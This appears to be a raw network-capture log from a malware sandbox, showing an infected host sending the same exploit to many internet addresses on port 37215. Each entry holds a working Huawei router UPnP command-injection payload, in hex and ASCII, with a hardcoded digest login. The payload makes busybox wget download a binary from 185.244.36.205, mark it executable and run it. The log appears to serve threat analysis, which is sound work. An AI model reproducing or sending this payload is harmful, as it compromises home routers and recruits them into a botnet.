                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2025192.168.2.1538210121.117.156.14037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102494955 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2026192.168.2.1534966222.11.22.17337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102539062 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2027192.168.2.1557668102.159.236.5837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102540016 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2028192.168.2.153956431.89.209.3537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102546930 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2029192.168.2.153610631.87.196.4037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102565050 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2030192.168.2.1535070121.15.179.3537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102602005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2031192.168.2.1545662222.16.174.11937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102602959 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2032192.168.2.1535724102.163.6.21237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102602959 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2033192.168.2.1556798197.119.19.8137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102612019 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2034192.168.2.1540270186.221.90.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.102652073 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
